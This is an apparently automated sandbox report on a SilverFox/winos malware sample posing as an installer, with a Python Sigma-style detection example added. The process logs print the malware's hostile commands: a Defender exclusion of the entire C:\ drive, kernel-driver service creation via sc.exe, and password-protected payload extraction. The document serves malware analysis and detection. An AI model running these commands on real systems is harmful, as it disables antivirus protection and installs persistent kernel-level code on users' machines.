Windows Analysis Report
#U5b89#U88c5#U52a9#U624b2.0.5.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b2.0.5.exe (the report's #Uxxxx escaping of the Unicode file name 安装助手2.0.5.exe, "Installation Assistant 2.0.5")
Original sample name: 2.0.5.exe
Analysis ID: 1580393
MD5: 87a72f4be35eff0b33e71d38146067b6
SHA1: 18444d42be38abaaa8e41a643f3db7f89338accb
SHA256: be5caf69b35ebefb40069de05b80b28f4d89d532dd3661b39e0762556c89585d
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • SgrmBroker.exe (PID: 2000 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 2760 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6140 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6640 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • #U5b89#U88c5#U52a9#U624b2.0.5.exe (PID: 7176 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" MD5: 87A72F4BE35EFF0B33E71D38146067B6)
    • #U5b89#U88c5#U52a9#U624b2.0.5.tmp (PID: 7276 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" MD5: 4E9D08C44F409F54940837360055C5AF)
      • powershell.exe (PID: 7292 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7644 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b2.0.5.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENT MD5: 87A72F4BE35EFF0B33E71D38146067B6)
        • #U5b89#U88c5#U52a9#U624b2.0.5.tmp (PID: 7628 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$10448,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENT MD5: 4E9D08C44F409F54940837360055C5AF)
          • 7zr.exe (PID: 7800 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7912 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7460 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cmd.exe (PID: 7752 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7768 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8016 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8032 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8048 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8136 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8148 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1312 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3540 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3452 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7376 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7232 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1652 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7512 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2056 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1168 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1568 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1588 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1840 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1888 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1928 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7216 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7708 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2992 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3084 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7760 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7796 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6012 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5976 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6968 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7868 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6696 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7332 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7456 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7516 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6204 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4376 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7984 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7968 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8028 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8044 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8080 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8156 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8112 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5144 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3452 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7304 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1240 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7412 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp, ParentProcessId: 7276, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7292, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7752, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7768, ProcessName: sc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp, ParentProcessId: 7276, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7292, ProcessName: powershell.exe
Source: Process started; Author: frack113, Nasreddine Bencherchali; Data: Command: "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp, NewProcessName: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp, OriginalFileName: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp, ParentCommandLine: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe", ParentImage: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe, ParentProcessId: 7176, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.5.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" , ProcessId: 7276, ProcessName: #U5b89#U88c5#U52a9#U624b2.0.5.tmp
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7752, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7768, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp, ParentProcessId: 7276, ParentProcessName: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7292, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, ProcessId: 2760, ProcessName: svchost.exe
No Suricata rule has matched
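The three Sigma matches above (a Defender exclusion added with Add-MpPreference, a kernel driver registered through sc.exe, and an 8.3 short-name path in a command line) reduce to string checks on process-creation events. The following is an added example, not Joe Sandbox or Sigma project code: it reimplements those checks in Python, including Sigma's base64offset matching so an -EncodedCommand variant of the same Add-MpPreference call is also caught, and runs them over event records constructed from command lines in this report's process tree. PID 7293 is an invented encoded-command variant that does not appear in the report; the rule titles are the Sigma titles the report lists.

```python
"""Sigma-style checks for the three process-creation behaviours this report
flags: a Defender exclusion added with Add-MpPreference, a kernel driver
registered through sc.exe, and an 8.3 short-name path in a command line.
Added example, not Joe Sandbox or Sigma project code. Event records are
constructed from command lines in the report's process tree; PID 7293 is an
invented -EncodedCommand variant that is not in the report.
"""
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str      # full path of the created process
    cmdline: str    # its command line as logged (e.g. Sysmon event ID 1)


def base64offset_patterns(needle):
    """The three base64 substrings that appear whenever `needle` (bytes) is
    base64-encoded at any byte alignment; this is Sigma's base64offset
    modifier. Leading/trailing characters that mix in neighbouring bytes are
    trimmed so each result is a stable substring of the full encoding."""
    start = (0, 2, 3)
    end = (None, -3, -2)
    patterns = []
    for i in range(3):
        enc = base64.b64encode(b" " * i + needle).decode("ascii")
        patterns.append(enc[start[i]:end[(len(needle) + i) % 3]])
    return patterns


MP_CMDLETS = ("Add-MpPreference", "Set-MpPreference")
EXCLUSION_RE = re.compile(r"-Exclusion(Path|Extension|Process|IpAddress)\b", re.I)
KERNEL_SVC_RE = re.compile(r"\bcreate\b.*\btype=\s*kernel\b", re.I)
SHORT_NAME_RE = re.compile(r"\\[^\\\s\"]*~\d+\\")     # e.g. \user~1\


def defender_exclusion(ev):
    """Add/Set-MpPreference with an -Exclusion* parameter, plain or encoded.
    PowerShell's -EncodedCommand takes UTF-16LE, so the encoded check looks
    for the UTF-16LE cmdlet name at all three base64 alignments."""
    if not ev.image.lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return False
    lowered = ev.cmdline.lower()
    if any(c.lower() in lowered for c in MP_CMDLETS) and EXCLUSION_RE.search(ev.cmdline):
        return True
    return any(p in ev.cmdline
               for c in MP_CMDLETS
               for p in base64offset_patterns(c.encode("utf-16-le")))


def kernel_driver_via_sc(ev):
    """sc.exe create ... type= kernel (sc.exe requires the `key= value` spacing)."""
    return ev.image.lower().endswith("\\sc.exe") and bool(KERNEL_SVC_RE.search(ev.cmdline))


def short_name_path(ev):
    """8.3 short names (user~1) in a command line, a common way to dodge string matches."""
    return bool(SHORT_NAME_RE.search(ev.cmdline))


RULES = {
    "Powershell Defender Exclusion": defender_exclusion,
    "New Kernel Driver Via SC.EXE": kernel_driver_via_sc,
    "Use Short Name Path in Command Line": short_name_path,
}


def evaluate(events):
    """Map pid -> list of rule titles for every event matching at least one rule."""
    hits = {}
    for ev in events:
        titles = [t for t, check in RULES.items() if check(ev)]
        if titles:
            hits[ev.pid] = titles
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SC = r"C:\Windows\System32\sc.exe"
TMP = r"C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp"
# Constructed: the report's Add-MpPreference call as it would look via -EncodedCommand.
ENCODED = base64.b64encode("Add-MpPreference -ExclusionPath 'C:\\'".encode("utf-16-le")).decode("ascii")

EVENTS = [
    ProcEvent(7276, TMP, r'"C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe"'),
    ProcEvent(7292, PS, r'''"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"'''),
    ProcEvent(7293, PS, "powershell.exe -EncodedCommand " + ENCODED),       # constructed
    ProcEvent(7768, SC, r'sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto'),
    ProcEvent(8032, SC, "sc start CleverSoar"),
    ProcEvent(7800, r"C:\Program Files (x86)\Windows NT\7zr.exe", "7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald"),
]

if __name__ == "__main__":
    for pid, titles in evaluate(EVENTS).items():
        print(pid, titles)
```

Only PIDs 7276, 7292, 7768 and the constructed 7293 fire; `sc start CleverSoar` and the 7zr.exe extractions do not, which matches the Sigma hits the report lists. The base64offset helper is what lets the same keyword match whether it sits at byte offset 0, 1 or 2 of the encoded command.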

AV Detection

Source: C:\Program Files (x86)\Windows NT\hrsw.vbc; ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\update.vac; ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\update.vac; ReversingLabs: Detection: 23%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 94.9% probability
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb; source: 7zr.exe, 00000013.00000003.1430369809.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 00000013.00000003.1430551725.00000000037B0000.00000004.00001000.00020000.00000000.sdmp
